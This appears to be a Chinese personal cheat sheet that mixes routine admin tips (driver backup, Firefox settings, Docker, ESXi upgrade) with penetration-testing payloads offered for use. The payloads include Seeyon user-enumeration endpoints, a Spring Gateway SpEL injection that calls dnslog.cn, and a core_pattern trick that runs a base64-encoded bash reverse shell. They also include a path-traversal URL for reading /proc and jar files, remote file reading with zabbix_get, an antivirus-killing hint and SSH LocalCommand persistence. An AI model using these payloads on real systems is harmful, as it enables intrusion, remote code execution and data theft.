工作中往往遇到一些莫名其妙的问题，快速记录一下。

# WIndows驱动快速备份命令
dism /online /export-driver /destination:D:\驱动备份\

# Firefox不时的请求success.txt
打开about:config
network.captive-portal-service.enabled 修改为 false
dom.push.enabled 修改为 false

# Friefox 请求非常规端口页面
打开about:config
network.security.ports.banned.override 修改为 0-65535

# Friefox 关闭WebRTC，保护隐私
打开about:config
media.peerconnection.enabled 修改为 false

# SSH 指定密钥交换算法与加密算法
ssh -o KexAlgorithms=+diffie-hellman-group-exchange-sha1 -c aes128-cbc root@localhost

# nacos 导出配置文件
http://localhost:8848/nacos/v1/cs/configs?export=true&tenant=&group=&appName=&dataId=&ids=&accessToken=XXXXXXXXXXX

# Registries仓库导出镜像
docker login http://x.x.x.x
docker pull demo:latest
docker save -o demo.tar demo:latest

# Docker Tools
https://download.docker.com/

# 致远用户枚举
/seeyon/rest/password/retrieve/getEmailByLoginName/system
/seeyon/rest/password/retrieve/send/system
/seeyon/personalBind.do?method=getBindTypeByLoginName&loginName=system

# 关闭杀软
PspTerminateThreadByPointer

# spring gateway 与nacos 动态路由

spring:
  cloud:
    gateway:
      routes:
        - id: echo
          order: 0
          uri: lb://service-provider
          predicates:
            - Path=/echo/**
          filters:
            - name: AddResponseHeader
              args:
                name: result
                value: "#{new java.lang.String(T(java.net.InetAddress).getByName("dnslog.cn"))}"

# VMware ESXI在线升级

\# 配置DNS服务器
echo "nameserver 8.8.8.8" > /etc/resolv.conf
\# 获取Profile版本
esxcli software profile get
\# 关闭防火墙策略
esxcli network firewall ruleset set -e true -r httpClient
\# 获取本地 Profile 版本
esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
\# 执行在线升级
esxcli software profile update -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p ESXi-8.0.0-20513097-standard
\# 强制在线升级
esxcli software profile update -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p ESXi-8.0.0-20513097-standard --no-hardware-warning
\# 恢复防火墙策略
esxcli network firewall ruleset set -e false -r httpClient

# core_pattern利用
linux中的/proc目录是一个伪文件系统，其中动态反应着系统内进程以及其他组件的状态。/proc/sys/kernel/core_pattern文件是负责进程奔溃时内存数据转储的，当第一个字符是管道符|时，后面的部分会以命令行的方式进行解析并运行。

echo '|/bin/bash -c echo${IFS%%??}L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8xMjcuMC4wLjEvMzMwNiAwPiYxCgo=|base64${IFS%%??}-d|/bin/bash' > /proc/sys/kernel/core_pattern

让当前 shell 进程收到一个 SIGSEGV 信号，导致进程异常终止从而触发core_pattern。

sh -c 'kill -11 "$$"'

# 进程环境变量
/proc/self/environ
/proc/self/cmdline
以某依的任意文件下载为例，获取jar完整路径：
http://xx.xx.xx.xx/login;/..;/common/download/resource?resource=/profile/../../../../../../../../../../../../../../../../../../../../proc/self/cmdline [获取jar文件名]
http://xx.xx.xx.xx/login;/..;/common/download/resource?resource=/profile/../../../../../../../../../../../../../../../../../../../../proc/self/cmdline [获取执行路径]
拼接即可获取jar完整路径
http://xx.xx.xx.xx/login;/..;/common/download/resource?resource=/profile/../../../../../../../../../../../../../../../../../../../../home/xxx/xxx.jar

# zabbix_get远程读取文件
目前大部分的zabbix agent端都不开启命令执行，这时候我们可以通过zabbix_get尝试远程读取文件，获取敏感信息。vfs.file.contents虽然支持通配符和宏，但基本上用不到。
./zabbix_get -s x.x.x.x -p 10050 -k vfs.file.contents[/path/to/file]

# SSH链接自动执行脚本
放在SSH 配置文件 /home/xxx/.ssh/config,当SSH连接成功后执行的本地命令

Host *
    PermitLocalCommand yes
    LocalCommand /bin/sh /home/test/1.sh 2>/dev/null

# Linux定时任务路径
/etc/cron.d/
/etc/cron.daily/
/etc/cron.hourly/
/etc/cron.weekly/
/etc/cron.monthly/
/var/spool/cron/
/etc/crontab
/etc/anacrontab

# Spring Bypass 403

# masscan结果整理
awk '/tcp/ {print $4":"$3}'